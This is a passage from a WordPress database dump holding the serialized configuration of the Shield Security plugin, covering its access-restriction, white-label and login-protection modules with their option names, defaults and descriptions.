ttrack_loginfailed\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:21:\"bottrack_logininvalid\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:18:\"bottrack_useragent\";a:2:{s:3:\"cat\";i:1;s:7:\"offense\";b:1;}s:15:\"bottrack_xmlrpc\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:22:\"bottrack_invalidscript\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:16:\"comment_markspam\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:18:\"comment_unmarkspam\";a:3:{s:5:\"audit\";b:0;s:7:\"offense\";b:0;s:4:\"stat\";b:0;}}}s:10:\"meta_modts\";i:1628268100;}','no'),(468212,'_site_transient_shield_mod_config_6b3304b9891738d259290b0c3150bc82','a:6:{s:4:\"slug\";s:8:\"insights\";s:10:\"properties\";a:16:{s:4:\"slug\";s:8:\"insights\";s:4:\"name\";s:9:\"Dashboard\";s:10:\"menu_title\";s:18:\"Security Dashboard\";s:13:\"menu_priority\";s:1:\"5\";s:21:\"show_module_menu_item\";b:1;s:19:\"show_module_options\";b:0;s:12:\"auto_enabled\";b:1;s:11:\"storage_key\";s:8:\"insights\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:14:\"skip_processor\";b:1;s:16:\"tracking_exclude\";b:1;}s:5:\"wpcli\";a:1:{s:7:\"enabled\";b:0;}s:8:\"sections\";a:1:{i:0;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:0:{}s:10:\"meta_modts\";i:1628268100;}','no'),(468213,'_site_transient_shield_mod_config_e0495676067f0167956087cced45d94f','a:8:{s:4:\"slug\";s:24:\"admin_access_restriction\";s:10:\"properties\";a:14:{s:4:\"slug\";s:24:\"admin_access_restriction\";s:4:\"name\";s:14:\"Security Admin\";s:12:\"sidebar_name\";s:14:\"Security Admin\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:24:\"admin_access_restriction\";s:7:\"tagline\";s:58:\"Protect your Security Plugin, not just your WordPress site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:20;}s:5:\"wpcli\";a:1:{s:4:\"root\";s:8:\"secadmin\";}s:13:\"admin_notices\";a:2:{s:26:\"certain-options-restricted\";a:5:{s:2:\"id\";s:26:\"certain-options-restricted\";s:8:\"schedule\";s:10:\"conditions\";s:12:\"plugin_admin\";s:2:\"no\";s:8:\"per_user\";b:1;s:4:\"type\";s:7:\"warning\";}s:22:\"admin-users-restricted\";a:5:{s:2:\"id\";s:22:\"admin-users-restricted\";s:8:\"schedule\";s:10:\"conditions\";s:12:\"plugin_admin\";s:2:\"no\";s:4:\"type\";s:7:\"warning\";s:8:\"per_user\";b:1;}}s:8:\"sections\";a:5:{i:0;a:6:{s:4:\"slug\";s:31:\"section_security_admin_settings\";s:7:\"primary\";b:1;s:5:\"title\";s:35:\"Security Admin Restriction Settings\";s:11:\"title_short\";s:23:\"Security Admin Settings\";s:9:\"beacon_id\";i:215;s:7:\"summary\";a:2:{i:0;s:52:\"Purpose - Restrict access using a simple Access PIN.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:1;a:5:{s:4:\"slug\";s:38:\"section_admin_access_restriction_areas\";s:5:\"title\";s:32:\"Security Admin Restriction Zones\";s:11:\"title_short\";s:24:\"Access Restriction Zones\";s:9:\"beacon_id\";i:214;s:7:\"summary\";a:2:{i:0;s:120:\"Purpose - Restricts access to key WordPress areas for all users not authenticated with the Security Admin Access system.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:2;a:5:{s:4:\"slug\";s:18:\"section_whitelabel\";s:5:\"title\";s:18:\"Shield White Label\";s:11:\"title_short\";s:11:\"White Label\";s:9:\"beacon_id\";i:131;s:7:\"summary\";a:1:{i:0;s:92:\"Purpose - Rename and re-brand the Shield Security plugin for your client site installations.\";}}i:3;a:5:{s:4:\"slug\";s:54:\"section_enable_plugin_feature_admin_access_restriction\";s:5:\"title\";s:39:\"Enable Module: WordPress Security Admin\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:213;s:7:\"summary\";a:3:{i:0;s:100:\"Purpose - Restricts access to this plugin preventing unauthorized changes to your security settings.\";i:1;s:59:\"Recommendation - Keep the Security Admin feature turned on.\";i:2;s:63:\"You need to also enter a new Access PIN to enable this feature.\";}}i:4;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:21:{i:0;a:10:{s:3:\"key\";s:31:\"enable_admin_access_restriction\";s:7:\"section\";s:54:\"section_enable_plugin_feature_admin_access_restriction\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/40\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf02\";s:4:\"name\";s:21:\"Enable Security Admin\";s:7:\"summary\";s:41:\"Enforce Security Admin Access Restriction\";s:11:\"description\";s:157:\"Enable this with great care and consideration. When this Access PIN option is enabled, you must specify a key below and use it to gain access to this plugin.\";}i:1;a:11:{s:3:\"key\";s:16:\"admin_access_key\";s:7:\"section\";s:31:\"section_security_admin_settings\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:9:\"link_info\";s:19:\"https://shsec.io/42\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:215;s:4:\"name\";s:25:\"Security Admin Access PIN\";s:7:\"summary\";s:40:\"Provide/Update Security Admin Access PIN\";s:11:\"description\";s:92:\"Careful: If you forget this, you could potentially lock yourself out from using this plugin.\";}i:2;a:13:{s:3:\"key\";s:15:\"sec_admin_users\";s:7:\"section\";s:31:\"section_security_admin_settings\";s:8:\"advanced\";b:1;s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/dk\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:132;s:4:\"name\";s:15:\"Security Admins\";s:7:\"summary\";s:26:\"Persistent Security Admins\";s:11:\"description\";s:79:\"All emails, usernames, or user IDs entered here will always be Security Admins.\";}i:3;a:12:{s:3:\"key\";s:20:\"admin_access_timeout\";s:7:\"section\";s:31:\"section_security_admin_settings\";s:8:\"advanced\";b:1;s:7:\"default\";i:30;s:4:\"type\";s:7:\"integer\";s:3:\"min\";i:1;s:9:\"link_info\";s:19:\"https://shsec.io/41\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:387;s:4:\"name\";s:22:\"Security Admin Timeout\";s:7:\"summary\";s:63:\"Specify An Automatic Timeout Interval For Security Admin Access\";s:11:\"description\";s:133:\"This will automatically expire your Security Admin Session. Does not apply until you enter the access PIN again. Default: 60 minutes.\";}i:4;a:11:{s:3:\"key\";s:20:\"allow_email_override\";s:7:\"section\";s:31:\"section_security_admin_settings\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/gf\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:385;s:4:\"name\";s:20:\"Allow Email Override\";s:7:\"summary\";s:49:\"Allow Email Override Of Admin Access Restrictions\";s:11:\"description\";s:96:\"Allow the use of verification emails to override and switch off the Security Admin restrictions.\";}i:5;a:10:{s:3:\"key\";s:29:\"admin_access_restrict_options\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf32\";s:9:\"beacon_id\";i:214;s:4:\"name\";s:7:\"Options\";s:7:\"summary\";s:56:\"Restrict Access To Key WordPress Posts And Pages Actions\";s:11:\"description\";s:140:\"Careful: This will restrict access to page/post creation, editing and deletion. Note: Selecting \'Edit\' will also restrict all other options.\";}i:6;a:11:{s:3:\"key\";s:33:\"admin_access_restrict_admin_users\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:214;s:4:\"name\";s:11:\"Admin Users\";s:7:\"summary\";s:57:\"Restrict Access To Create/Delete/Modify Other Admin Users\";s:11:\"description\";s:127:\"Careful: This will restrict the ability of WordPress administrators from creating, modifying or promoting other administrators.\";}i:7;a:11:{s:3:\"key\";s:29:\"admin_access_restrict_plugins\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:8:\"advanced\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:16:\"activate_plugins\";s:4:\"text\";s:8:\"Activate\";}i:1;a:2:{s:9:\"value_key\";s:15:\"install_plugins\";s:4:\"text\";s:7:\"Install\";}i:2;a:2:{s:9:\"value_key\";s:14:\"update_plugins\";s:4:\"text\";s:6:\"Update\";}i:3;a:2:{s:9:\"value_key\";s:14:\"delete_plugins\";s:4:\"text\";s:6:\"Delete\";}}s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf21\";s:9:\"beacon_id\";i:214;s:7:\"summary\";s:47:\"Restrict Access To Key WordPress Plugin Actions\";s:11:\"description\";s:156:\"Careful: This will restrict access to plugin installation, update, activation and deletion. Note: Selecting \'Activate\' will also restrict all other options.\";}i:8;a:11:{s:3:\"key\";s:28:\"admin_access_restrict_themes\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:8:\"advanced\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:13:\"switch_themes\";s:4:\"text\";s:8:\"Activate\";}i:1;a:2:{s:9:\"value_key\";s:18:\"edit_theme_options\";s:4:\"text\";s:18:\"Edit Theme Options\";}i:2;a:2:{s:9:\"value_key\";s:14:\"install_themes\";s:4:\"text\";s:7:\"Install\";}i:3;a:2:{s:9:\"value_key\";s:13:\"update_themes\";s:4:\"text\";s:6:\"Update\";}i:4;a:2:{s:9:\"value_key\";s:13:\"delete_themes\";s:4:\"text\";s:6:\"Delete\";}}s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf21\";s:9:\"beacon_id\";i:214;s:7:\"summary\";s:42:\"Restrict Access To WordPress Theme Actions\";s:11:\"description\";s:90:\"Careful: This will restrict access to theme installation, update, activation and deletion.\";}i:9;a:11:{s:3:\"key\";s:27:\"admin_access_restrict_posts\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:8:\"advanced\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:4:\"edit\";s:4:\"text\";s:11:\"Create/Edit\";}i:1;a:2:{s:9:\"value_key\";s:7:\"publish\";s:4:\"text\";s:7:\"Publish\";}i:2;a:2:{s:9:\"value_key\";s:6:\"delete\";s:4:\"text\";s:6:\"Delete\";}}s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf21\";s:9:\"beacon_id\";i:214;s:7:\"summary\";s:56:\"Restrict Access To Key WordPress Posts And Pages Actions\";s:11:\"description\";s:79:\"Careful: This will restrict access to page/post creation, editing and deletion.\";}i:10;a:11:{s:3:\"key\";s:17:\"whitelabel_enable\";s:7:\"section\";s:18:\"section_whitelabel\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/dr\";s:9:\"link_blog\";s:19:\"https://shsec.io/ds\";s:9:\"beacon_id\";i:131;s:4:\"name\";s:18:\"Enable White Label\";s:7:\"summary\";s:34:\"Activate Your White Label Settings\";s:11:\"description\";s:61:\"Use this option to turn on/off the whole White Label feature.\";}i:11;a:9:{s:3:\"key\";s:15:\"wl_hide_updates\";s:7:\"section\";s:18:\"section_whitelabel\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Hide Updates\";s:7:\"summary\";s:47:\"Hide Available Updates From Non Security Admins\";s:11:\"description\";s:66:\"Hides the availability of Shield updates from non-security admins.\";}i:12;a:9:{s:3:\"key\";s:20:\"wl_replace_badge_url\";s:7:\"section\";s:18:\"section_whitelabel\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Replace Plugin Badge\";s:7:\"summary\";s:35:\"Replace Plugin Badge URL and Images\";s:11:\"description\";s:84:\"When using the plugin badge, replace the URL and link with your Whitelabel settings.\";}i:13;a:11:{s:3:\"key\";s:17:\"wl_pluginnamemain\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:6:\"Shield\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dt\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:216;s:4:\"name\";s:11:\"Plugin Name\";s:7:\"summary\";s:22:\"The Name Of The Plugin\";s:11:\"description\";s:23:\"The Name Of The Plugin.\";}i:14;a:10:{s:3:\"key\";s:11:\"wl_namemenu\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:15:\"Shield Security\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:10:\"Menu Title\";s:7:\"summary\";s:33:\"The Main Menu Title Of The Plugin\";s:11:\"description\";s:79:\"The Main Menu Title Of The Plugin. If left empty, the Plugin Name will be used.\";}i:15;a:11:{s:3:\"key\";s:14:\"wl_companyname\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:20:\"Example Company Name\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dt\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:216;s:4:\"name\";s:12:\"Company Name\";s:7:\"summary\";s:24:\"The Name Of Your Company\";s:11:\"description\";s:33:\"Provide the name of your company.\";}i:16;a:10:{s:3:\"key\";s:14:\"wl_description\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:74:\"Secure Your Sites With The World\'s Most Powerful WordPress Security Plugin\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Plugin Tag Line\";s:7:\"summary\";s:26:\"The Tag Line Of The Plugin\";s:11:\"description\";s:27:\"The Tag Line Of The Plugin.\";}i:17;a:10:{s:3:\"key\";s:10:\"wl_homeurl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:19:\"https://shsec.io/7f\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:8:\"Home URL\";s:7:\"summary\";s:20:\"Plugin Home Page URL\";s:11:\"description\";s:84:\"When a user clicks the home link for this plugin, this is where they\'ll be directed.\";}i:18;a:11:{s:3:\"key\";s:14:\"wl_menuiconurl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:20:\"pluginlogo_16x16.png\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dt\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:216;s:4:\"name\";s:9:\"Menu Icon\";s:7:\"summary\";s:13:\"Menu Icon URL\";s:11:\"description\";s:42:\"The URL of the icon displayed in the menu.\";}i:19;a:11:{s:3:\"key\";s:19:\"wl_dashboardlogourl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:22:\"pluginlogo_128x128.png\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:216;s:4:\"name\";s:17:\"Plugin Badge Logo\";s:7:\"summary\";s:21:\"Plugin Badge Logo URL\";s:11:\"description\";s:72:\"The URL of the logo displayed in the main dashboard. Should be 128x128px\";}i:20;a:10:{s:3:\"key\";s:19:\"wl_login2fa_logourl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:29:\"pluginlogo_banner-772x250.png\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dt\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Dashboard and 2FA Logo\";s:7:\"summary\";s:26:\"Dashboard and 2FA Logo URL\";s:11:\"description\";s:72:\"The URL of the logo displayed in the main dashboard. Should be 128x128px\";}}s:11:\"definitions\";a:3:{s:22:\"restricted_pages_users\";a:2:{i:0;s:13:\"user-edit.php\";i:1;s:9:\"users.php\";}s:6:\"events\";a:2:{s:11:\"key_success\";a:1:{s:6:\"recent\";b:1;}s:8:\"key_fail\";a:3:{s:3:\"cat\";i:3;s:6:\"recent\";b:1;s:7:\"offense\";b:1;}}s:19:\"options_to_restrict\";a:4:{s:12:\"wpms_options\";a:3:{i:0;s:11:\"admin_email\";i:1;s:9:\"site_name\";i:2;s:12:\"registration\";}s:10:\"wpms_pages\";a:1:{i:0;s:12:\"settings.php\";}s:10:\"wp_options\";a:10:{i:0;s:8:\"blogname\";i:1;s:15:\"blogdescription\";i:2;s:7:\"siteurl\";i:3;s:4:\"home\";i:4;s:11:\"admin_email\";i:5;s:15:\"new_admin_email\";i:6;s:18:\"users_can_register\";i:7;s:15:\"comments_notify\";i:8;s:18:\"comment_moderation\";i:9;s:11:\"blog_public\";}s:8:\"wp_pages\";a:4:{i:0;s:19:\"options-general.php\";i:1;s:22:\"options-discussion.php\";i:2;s:19:\"options-reading.php\";i:3;s:11:\"options.php\";}}}s:10:\"meta_modts\";i:1628268100;}','no'),(510495,'w3tc_extensions_hooks','{\"actions\":[],\"filters\":[],\"next_check_date\":1632404483}','yes'),(468219,'_site_transient_shield_mod_config_37aa160154af07c34ea6c8958d347db8','a:7:{s:4:\"slug\";s:13:\"login_protect\";s:10:\"properties\";a:14:{s:4:\"slug\";s:13:\"login_protect\";s:4:\"name\";s:11:\"Login Guard\";s:12:\"sidebar_name\";s:16:\"Login Protection\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:12:\"loginprotect\";s:7:\"tagline\";s:83:\"Block brute force attacks and secure user identities with Two-Factor Authentication\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:40;}s:13:\"admin_notices\";a:1:{s:23:\"email-verification-sent\";a:7:{s:2:\"id\";s:23:\"email-verification-sent\";s:8:\"schedule\";s:10:\"conditions\";s:16:\"plugin_page_only\";b:1;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:7:\"warning\";s:12:\"plugin_admin\";s:3:\"yes\";s:11:\"valid_admin\";b:1;}}s:8:\"sections\";a:9:{i:0;a:6:{s:4:\"slug\";s:36:\"section_brute_force_login_protection\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"Brute Force Login Guard\";s:11:\"title_short\";s:11:\"Brute Force\";s:9:\"beacon_id\";i:325;s:7:\"summary\";a:2:{i:0;s:87:\"Purpose - Blocks brute force hacking attacks against your login and registration pages.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:1;a:5:{s:4:\"slug\";s:17:\"section_2fa_email\";s:5:\"title\";s:31:\"Email Two-Factor Authentication\";s:11:\"title_short\";s:11:\"2FA - Email\";s:9:\"beacon_id\";i:246;s:7:\"summary\";a:3:{i:0;s:102:\"Purpose - Verifies the identity of users who log in to your site using email-based one-time-passwords.\";i:1;s:127:\"Recommendation - Use of this feature is highly recommend. However, if your host blocks email sending you may lock yourself out.\";i:2;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:2;a:5:{s:4:\"slug\";s:14:\"section_2fa_ga\";s:5:\"title\";s:46:\"Google Authenticator Two-Factor Authentication\";s:11:\"title_short\";s:26:\"2FA - Google Authenticator\";s:9:\"beacon_id\";i:244;s:7:\"summary\";a:3:{i:0;s:111:\"Purpose - Verifies the identity of users who log in to your site using Google Authenticator one-time-passwords.\";i:1;s:127:\"Recommendation - Use of this feature is highly recommend. However, if your host blocks email sending you may lock yourself out.\";i:2;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:3;a:5:{s:4:\"slug\";s:31:\"section_hardware_authentication\";s:5:\"title\";s:32:\"Hardware 2-Factor Authentication\";s:11:\"title_short\";s:14:\"2FA - Hardware\";s:9:\"beacon_id\";i:249;s:7:\"summary\";a:2:{i:0;s:98:\"Purpose - Verifies the identity of users who log in to your site using Yubikey one-time-passwords.\";i:1;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:4;a:5:{s:4:\"slug\";s:34:\"section_multifactor_authentication\";s:5:\"title\";s:27:\"Multi-Factor Authentication\";s:11:\"title_short\";s:13:\"2-Factor Auth\";s:9:\"beacon_id\";i:326;s:7:\"summary\";a:3:{i:0;s:103:\"Purpose - Verifies the identity of users who log in to your site - i.e. they are who they say they are.\";i:1;s:127:\"Recommendation - Use of this feature is highly recommend. However, if your host blocks email sending you may lock yourself out.\";i:2;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:5;a:5:{s:4:\"slug\";s:22:\"section_rename_wplogin\";s:5:\"title\";s:18:\"Hide WP Login Page\";s:11:\"title_short\";s:15:\"Hide Login Page\";s:9:\"beacon_id\";i:316;s:7:\"summary\";a:2:{i:0;s:142:\"Purpose - To hide your wp-login.php page from brute force attacks and hacking attempts - if your login page cannot be found, no-one can login.\";i:1;s:145:\"Recommendation - This is not required for complete security and if your site has irregular or inconsistent configuration it may not work for you.\";}}i:6;a:5:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:13:\"User Messages\";s:11:\"title_short\";s:13:\"User Messages\";s:9:\"beacon_id\";i:139;s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: default\";}}i:7;a:5:{s:4:\"slug\";s:46:\"section_enable_plugin_feature_login_protection\";s:5:\"title\";s:26:\"Disable Login Guard Module\";s:11:\"title_short\";s:7:\"Disable\";s:9:\"beacon_id\";i:249;s:7:\"summary\";a:2:{i:0;s:91:\"Purpose - Login Guard blocks all automated and brute force attempts to log in to your site.\";i:1;s:55:\"Recommendation - Keep the Login Guard module turned on.\";}}i:8;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:24:{i:0;a:11:{s:3:\"key\";s:20:\"enable_login_protect\";s:7:\"section\";s:46:\"section_enable_plugin_feature_login_protection\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/51\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf03\";s:9:\"beacon_id\";i:249;s:4:\"name\";s:18:\"Enable Login Guard\";s:7:\"summary\";s:42:\"Enable (or Disable) The Login Guard Module\";s:11:\"description\";s:70:\"Un-Checking this option will completely disable the Login Guard module\";}i:1;a:12:{s:3:\"key\";s:19:\"rename_wplogin_path\";s:7:\"section\";s:22:\"section_rename_wplogin\";s:8:\"advanced\";b:1;s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/5q\";s:9:\"link_blog\";s:19:\"https://shsec.io/5r\";s:9:\"beacon_id\";i:316;s:4:\"name\";s:15:\"Hide Login Page\";s:7:\"summary\";s:31:\"Rename The WordPress Login Page\";s:11:\"description\";s:101:\"Creating a path here will disable your \'wp-login.php\'. Only letters and numbers are permitted: abc123\";}i:2;a:10:{s:3:\"key\";s:29:\"enable_chained_authentication\";s:7:\"section\";s:34:\"section_multifactor_authentication\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/9r\";s:9:\"link_blog\";s:19:\"https://shsec.io/84\";s:9:\"beacon_id\";i:326;s:4:\"name\";s:27:\"Multi-Factor Authentication\";s:7:\"summary\";s:41:\"Require All Active Authentication Factors\";s:11:\"description\";s:123:\"When enabled, all multi-factor authentication methods will be applied to a user login. Disable to only require one to pass.\";}i:3;a:12:{s:3:\"key\";s:8:\"mfa_skip\";s:7:\"section\";s:34:\"section_multifactor_authentication\";s:7:\"premium\";b:1;s:7:\"default\";i:0;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/b1\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:141;s:4:\"name\";s:19:\"Multi-Factor Bypass\";s:7:\"summary\";s:78:\"A User Can Bypass Multi-Factor Authentication (MFA) For The Set Number Of Days\";s:11:\"description\";s:97:\"Enter the number of days a user can bypass future MFA after a successful MFA-login. 0 to disable.\";}i:4;a:11:{s:3:\"key\";s:17:\"allow_backupcodes\";s:7:\"section\";s:34:\"section_multifactor_authentication\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/dx\";s:9:\"link_blog\";s:19:\"https://shsec.io/dy\";s:9:\"beacon_id\";i:143;s:4:\"name\";s:18:\"Allow Backup Codes\";s:7:\"summary\";s:37:\"Allow Users To Generate A Backup Code\";s:11:\"description\";s:95:\"Allow users to generate a backup code that can be used to login if MFA factors are unavailable.\";}i:5;a:10:{s:3:\"key\";s:27:\"enable_google_authenticator\";s:7:\"section\";s:14:\"section_2fa_ga\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:22:\"https://shsec.io/shld7\";s:9:\"link_blog\";s:22:\"https://shsec.io/shld6\";s:9:\"beacon_id\";i:245;s:4:\"name\";s:27:\"Enable Google Authenticator\";s:7:\"summary\";s:39:\"Allow Users To Use Google Authenticator\";s:11:\"description\";s:101:\"When enabled, users will have the option to add Google Authenticator to their WordPress user profile.\";}i:6;a:10:{s:3:\"key\";s:27:\"enable_email_authentication\";s:7:\"section\";s:17:\"section_2fa_email\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3t\";s:9:\"link_blog\";s:19:\"https://shsec.io/9q\";s:9:\"beacon_id\";i:247;s:4:\"name\";s:27:\"Enable Email Authentication\";s:7:\"summary\";s:40:\"Two-Factor Login Authentication By Email\";s:11:\"description\";s:90:\"All users will be required to verify their login by email-based two-factor authentication.\";}i:7;a:12:{s:3:\"key\";s:26:\"two_factor_auth_user_roles\";s:7:\"section\";s:17:\"section_2fa_email\";s:8:\"advanced\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:4:{i:0;s:11:\"contributor\";i:1;s:6:\"author\";i:2;s:6:\"editor\";i:3;s:13:\"administrator\";}s:13:\"value_options\";a:10:{i:0;a:2:{s:9:\"value_key\";s:10:\"subscriber\";s:4:\"text\";s:11:\"Subscribers\";}i:1;a:2:{s:9:\"value_key\";s:11:\"contributor\";s:4:\"text\";s:12:\"Contributors\";}i:2;a:2:{s:9:\"value_key\";s:6:\"author\";s:4:\"text\";s:7:\"Authors\";}i:3;a:2:{s:9:\"value_key\";s:6:\"editor\";s:4:\"text\";s:7:\"Editors\";}i:4;a:2:{s:9:\"value_key\";s:13:\"administrator\";s:4:\"text\";s:14:\"Administrators\";}i:5;a:2:{s:9:\"value_key\";s:8:\"customer\";s:4:\"text\";s:14:\"[Woo] Customer\";}i:6;a:2:{s:9:\"value_key\";s:12:\"shop_manager\";s:4:\"text\";s:22:\"[Woo/EDD] Shop Manager\";}i:7;a:2:{s:9:\"value_key\";s:15:\"shop_accountant\";s:4:\"text\";s:21:\"[EDD] Shop Accountant\";}i:8;a:2:{s:9:\"value_key\";s:11:\"shop_worker\";s:4:\"text\";s:17:\"[EDD] Shop Worker\";}i:9;a:2:{s:9:\"value_key\";s:14:\"edd_subscriber\";s:4:\"text\";s:14:\"[EDD] 